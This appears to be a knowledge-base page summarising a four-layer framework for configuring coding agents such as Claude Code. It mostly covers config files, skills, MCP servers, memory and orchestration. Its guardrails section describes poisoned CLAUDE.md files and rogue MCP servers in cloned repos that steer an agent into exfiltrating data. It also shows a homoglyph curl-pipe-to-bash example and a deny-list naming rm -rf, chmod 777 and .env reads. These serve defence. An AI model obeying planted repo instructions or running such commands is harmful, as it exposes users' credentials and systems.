Agentic Engineering
A four-layer framework for configuring coding agents to produce reliable, production-quality results.
Last updated: 2026-04-12
Overview
“Agentic Engineering” is Karpathy’s term for the emerging practice of working effectively with autonomous coding agents — distinct from vibe coding (prompting casually) or traditional software engineering. The gap between mediocre and excellent agent results is mostly about configuration, not model choice.
Paul Hoekstra’s framework organizes this into four layers, each addressing a different failure mode:
| Layer | What it solves | Key tools |
|---|---|---|
| Configuration | Agent ignoring conventions, defaulting to training data | CLAUDE.md, skills, workflow frameworks |
| Capability | Agent hallucinating, lacking live context | MCP servers, memory, live docs |
| Orchestration | Parallel work conflicts, slow sequential execution | Subagents, worktrees |
| Guardrails | Destructive actions, security, runaway autonomy | Hooks, permissions |
Layer 1: Configuration
CLAUDE.md — less is more
CLAUDE.md is injected into every API call, not just the first. A 2,000-token file in a 40-call session costs 80,000 input tokens just for instructions. Context bloat degrades performance: GPT-5.4 drops from 97.3% to 36.6% benchmark score at full context. A study found AI-generated boilerplate in the system prompt produces worse results than no file at all.
Rules of thumb:
- Only include specific, human-curated rules you want enforced at all times
- Keep it short; treat it as a living document
- Cut any rule not consistently improving outcomes
- When the model makes the same mistake repeatedly, add a targeted rule
Skills — loaded on demand
Skills live in .claude/skills/ and load contextually, not always. They keep domain knowledge out of the always-on context window. YAML frontmatter (name, description, globs) controls when they trigger.
SkillsBench evidence: Claude Haiku with human-curated skills (27.7%) beat Claude Opus without skills (22.0%) across 86 tasks. Skills matter more than model size. AI-generated skills erased all gains — human curation is the differentiator.
Enforcing skill compliance
Skills enforce nothing by default — models rationalize past instructions. Two techniques from obra/superpowers:
HARD-GATE directives: XML-tagged checkpoints. Models give disproportionate weight to XML-like tags (Anthropic recommends this in their own prompt engineering docs):
<HARD-GATE>
Do NOT write any code or take any implementation action
until you have presented a design and the user has approved it.
This applies to EVERY project regardless of perceived simplicity.
</HARD-GATE>
Anti-rationalization tables: Pre-emptive lists of common model excuses paired with corrections. The model generates plausible reasons to skip steps because humans in training data do the same. The table short-circuits this pattern before it starts.
Workflow frameworks
Full methodologies built from chained skills:
- Superpowers (
obra/superpowers): TDD, debugging, verification, code review skills with hard gates - Get Shit Done: slash commands + hooks + meta-prompting
- Compound Engineering: Plan → Work → Review → Compound; last phase accumulates patterns into a searchable knowledge base
Division of labour
CLAUDE.md → always-relevant project rules (short, human-curated)
Skills → reusable task-specific procedures (loaded on demand)
Live prompt → what's unique about the current task
The AI Sycophancy Problem
Models default to telling you what you seem to want to hear, not what’s true. The Bullshit Benchmark measures how often models challenge incoherent prompts vs. accept them. Results are poor across the board. In code, this manifests as redundant checks, unnecessary validation, and defensive error handling nobody asked for — instead of questioning bad assumptions.
CLAUDE.md behavioral rules and HARD-GATE directives are partly a defense against this default.
Layer 2: Capability
MCP and deferred loading
Fully loaded MCPs are expensive: GitHub MCP alone is ~2,200 tokens. With deferred tool loading (the default as of 2026), the agent starts with just a list of tool names and descriptions — full schema only fetched when a tool is actually used. A stack of GitHub + Exa + Context7 + DeepWiki runs ~607 tokens before any tools are used, vs. ~5,500 tokens fully loaded. Still more than a skill (which might be a few dozen tokens), but manageable.
MCP’s value isn’t just calling tools — it’s standardisation, auth, permissions, and cleaner interfaces than raw APIs/CLIs that were never designed with agents in mind.
The three external tools worth having
- Context7: pulls live library docs, eliminating hallucinated API calls to renamed/deprecated functions
- DeepWiki: AI-generated docs for GitHub repos — “how does authentication work?” answered from the actual codebase
- Exa: AI-optimized search returning structured results, extracted content, highlights — not raw pages
Visual output extensions
Skills and MCPs aren’t limited to application code. Figma’s MCP server lets the agent read design specs and write back to the Figma canvas. frontend-slides (Claude Code skill) generates complete self-contained HTML presentations. remotion-best-practices produces Remotion/React code that renders to MP4.
Persistent memory: three layers
Claude Code sessions are stateless; each starts fresh. Three tools address memory at different layers:
| Layer | Tool | What it covers | Scales? |
|---|---|---|---|
| Active context | MEMORY.md | Conventions, current decisions | No — flat file, token pressure |
| Session history | episodic-memory | Past conversations, reasoning traces | Yes — SQLite + vectors |
| Broader knowledge | QMD (Tobi Lutke/Shopify) | Docs, specs, meeting notes | Yes — on-device search |
MEMORY.md works well at first; fails at scale because it’s injected into every system prompt like CLAUDE.md. episodic-memory (github.com/obra/episodic-memory) indexes JSONL session files as vectors so the agent can semantically search past conversations — recovering not just what was decided but why. QMD (github.com/tobi/qmd) exposes an MCP server over your broader knowledge base. Start with grep; reach for vectors when grep stops being enough.
See agent-memory for the full three-layer breakdown.
Layer 3: Orchestration
Context quality is the bottleneck
The Ralph loop (github.com/snarktank/ralph) went viral by doing something trivially simple: re-running a single agent in a loop with fresh context each iteration, tracking progress in files and git. Agents could work for hours without degrading, because the context window never filled up with stale reasoning and dead ends.
Subagents work for the same reason. The obvious benefit is parallelism. The bigger benefit is compression: test output, long docs, side quests all stay in the subagent’s context. Only the final result returns to the parent.
Subagents vs agent teams
Subagents: fire-and-forget workers, each with a clean context window and one job. Defined as Markdown files with YAML frontmatter in .claude/agents/ (project-level) or ~/.claude/agents/ (user-level). Key fields: name, description (routing signal — when to reach for this agent), tools, model. Cannot spawn subagents or talk to each other; all results flow through the parent.
Agent teams (experimental, CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1): long-running persistent instances that communicate directly with each other and coordinate via a shared task list with dependencies. Heavier, higher cost. For most use cases, start with subagents.
Git worktrees for parallel isolation
Multiple agents on the same repo will collide without worktrees. A worktree is a separate checkout sharing the same .git directory but with its own working tree and branch:
my-project/.worktrees/
├── feature-auth/ # agent 1
└── fix-billing/ # agent 2
claude --worktree starts a session in an isolated checkout. isolation: "worktree" in a subagent definition does it automatically. Project configs and memory are shared across worktrees.
Orchestration tools
- JetBrains Air: parallel agents in isolated Docker containers or worktrees, single review UI
- Conductor (conductor.build): similar for Claude Code + Codex; parallel sessions + diff viewer
- Vibekanban (github.com/BloopAI/vibe-kanban): lightweight kanban for agent tasks
- Cline Kanban: project decomposition from a single prompt; dependency-aware parallelization
- Paperclip (github.com/paperclipai/paperclip): org charts, task delegation, budget ceilings, governance with human “board” for high-impact decisions
Design around context, not roles
Splitting work by role (planner, implementer, tester) creates a telephone game where information degrades at every handoff. Split by context instead: an agent implementing a feature should also write its tests because it already has the context. The sweet spot is read-heavy delegation — exploration, analysis, summarisation. Keep write-heavy work sequential unless parallelism is truly necessary.
Layer 4: Guardrails
CLAUDE.md and MCP poisoning
A cloned repo can contain a CLAUDE.md with instructions that look like normal project config but exfiltrate data or execute arbitrary commands. Treat CLAUDE.md like a Makefile — as code, not documentation. Review before trusting. PR review required; no direct pushes to main.
Critical: Set enableAllProjectMcpServers: false. Otherwise a cloned repo can register its own MCP server — arbitrary code running with agent permissions. Combined with a poisoned CLAUDE.md, this is a clean supply-chain attack from a git clone.
Unicode homoglyph attacks
curl -sSL https://install.example-cli.dev | bash and curl -sSL https://іnstall.example-clі.dev | bash look identical. The Latin i is ASCII 105; the Cyrillic і is Unicode 1110. Browsers show punycode for defense; terminals don’t.
Tirith (github.com/sheeki03/tirith): a local validator behind a PreToolUse hook on Bash. Catches hostname homoglyphs, path homoglyphs, insecure transport, ANSI injection, pipe-to-shell patterns, and environment manipulation.
Sandboxing
Built-in sandbox (Linux: bubblewrap; macOS: Apple Sandbox):
- Can read: project dir + system libraries
- Can write: project dir +
/tmp/claude-{uid}/ - Blocked even for reading:
~/.ssh,~/.aws,~/.gnupg,~/.docker - Network: whitelisted hosts only
For full isolation: Docker with --network none. For agent-generated code at scale: Cloudflare Dynamic Workers (per-execution, millisecond startup, credentials injected server-side).
Permissions
.claude/settings.json (project-level, committed to repo) defines what the agent can do without asking. .claude/settings.local.json (user-level, local) adds a deny-list:
{
"permissions": {
"allow": ["Bash(uv run pytest:*)", "Bash(git commit:*)", "Bash(gh pr create:*)"],
"deny": ["Read(./.env)", "Bash(rm -rf)", "Bash(chmod 777)", "Bash(git push --force origin main)"]
}
}Auto mode: built-in classifier between full manual approval and --dangerously-skip-permissions. Safe operations proceed automatically; risky ones get blocked. Combined with the deny-list and sandboxing, this lets the agent move without constant hand-holding.
AST-grep
AI writes syntactically perfect code that smuggles in subtly wrong patterns — code that passes ruff, passes type checking, maybe even passes tests, but contains patterns you never wanted. AST-grep catches this by matching code structure, not strings.
Example — mutable default arguments (AI reproduces this from millions of training examples without understanding it’s dangerous):
id: no-mutable-default-list
language: python
severity: error
rule:
kind: default_parameter
any:
- has: { kind: list }
- has: { kind: dictionary }Wire into pre-commit and CI. If your agent keeps producing the same anti-pattern, encode it as a structural rule and stop having the same conversation forever.
Pre-commit: the corrective loop
Four layers: standard hooks (trailing whitespace, valid YAML, 500KB limit) → Ruff → Bandit → AST-grep. The loop is corrective, not just defensive: agent writes code, hits pre-commit rejection, rewrites, commits clean. The enforcement teaches.
CI: the shared gate
Same checks enforced remotely in a fresh environment. Add a concurrency block to cancel stale runs when a new push arrives — agents are prolific branch creators and without this you burn Actions minutes on obsolete runs.
Connections
- claude-code-skills — detailed breakdown of skill types, writing tips, distribution; HARD-GATE and anti-rationalization extend this
- thin-harness-fat-skills — same architectural principle; Hoekstra adds the token cost argument for keeping the config layer lean
- coding-agent — Raschka’s six-component harness maps onto Hoekstra’s four layers
- model-context-protocol — Layer 2 (Capability) relies on MCP servers for live data access
- agent-memory — three-layer memory model from Layer 2 in detail
- paul-hoekstra — author
Sources
- Agentic Engineering, part 1: The Configuration Layer — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 2: What the Agent Doesn’t Know — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 3: The Orchestration Layer — Paul Hoekstra — added 2026-04-12
- Agentic Engineering, part 4: Keeping Agents on a Leash — Paul Hoekstra — added 2026-04-12